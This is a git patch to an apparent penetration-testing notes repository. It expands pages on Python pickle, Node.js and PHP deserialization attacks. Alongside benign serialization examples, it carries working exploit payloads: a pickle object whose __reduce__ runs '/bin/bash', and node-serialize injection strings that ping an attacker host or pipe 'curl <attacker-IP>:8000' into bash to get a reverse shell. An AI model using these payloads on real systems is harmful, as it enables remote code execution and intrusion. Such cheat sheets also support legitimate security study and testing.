From 6734e25c2df475d513e84d07b31990e2249108a8 Mon Sep 17 00:00:00 2001
From: gurkenhabicht <info@intheopen.org>
Date: Tue, 7 May 2024 21:38:46 +0200
Subject: [PATCH] details on pickle and php serialize

---
 Exploits/Python/Pickle.md               | 22 ++++++++++++++++--
 Exploits/Web/Node.js Deserialization.md |  5 ++++-
 Exploits/Web/PHP Deserialize.md         | 30 +++++++++++++++++++++++--
 3 files changed, 52 insertions(+), 5 deletions(-)

diff --git a/Exploits/Python/Pickle.md b/Exploits/Python/Pickle.md
index a9de31e..b7261dc 100644
--- a/Exploits/Python/Pickle.md
+++ b/Exploits/Python/Pickle.md
@@ -1,7 +1,25 @@
 # Pickle
 
+Serializes a Python object into a byte stream an back.
+When sending pickled data through a network do base64 encoding first to prevent
+special characters to do something unexpected.
+
+```python
+import pickle
+import base64
+
+
+text = "Hello, World!"
+pickled = pickle.dumps(text)
+send_data = base64.b64encode(pickled)
+receive_data = base64.b64decode(send_data)
+unpickled = pickle.loads(pickled)
+```
+
 ## Payload
-* Inject payload  
+
+The following payload can be injected into a pickled object.
+
 ```python
 import pickle
 import os
@@ -10,12 +28,12 @@ class evil_object(object):
     def __reduce__(self):
         return(os.system, ('/bin/bash',))
 x = evil_object()
-x = evil_object()
 y = pickle.dumps(x)
 base64.b64encode(y)
 ```
 
 * Dump serialized object via
+
 ```python
 pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
 ```
diff --git a/Exploits/Web/Node.js Deserialization.md b/Exploits/Web/Node.js Deserialization.md
index 25ee25c..9cf5d2a 100644
--- a/Exploits/Web/Node.js Deserialization.md	
+++ b/Exploits/Web/Node.js Deserialization.md	
@@ -5,10 +5,13 @@
 ## Example Payloads
 
 * Encode, send and wait with `sudo tcpdump -i <interface> icmp`
+
 ```js
 {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
 ```
-* reverse shell via 
+
+Reverse shell via 
+
 ```js
 {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
 ```
diff --git a/Exploits/Web/PHP Deserialize.md b/Exploits/Web/PHP Deserialize.md
index 2f40b20..1162946 100644
--- a/Exploits/Web/PHP Deserialize.md	
+++ b/Exploits/Web/PHP Deserialize.md	
@@ -1,8 +1,34 @@
-# Unserialize
+# PHP (De-)Serialization
+
+A basic example of (de-)serialization is the following
+
+Serialize is show in the following snippet.
+
+```php
+<?php
+$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
+$serialized = serialize($plain_text);
+file_put_contents('serialized.txt', $serialized);
+?>
+```
+
+Deserialize is done in the following snippet.
+
+```php
+<?php
+$serialized = file_get_contents('serialized.txt');
+$plain_text = unserialize($serialized);
+echo "Title: " . $plain_text['title'];
+echo "Content: " . $plain_text['content'];
+?>
+```
+
+## Unserialize
 
 * [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
 
-* Serialize via
+Serialize a form on a website through PHP via
+
 ```php
 <?php
 class FormSubmit {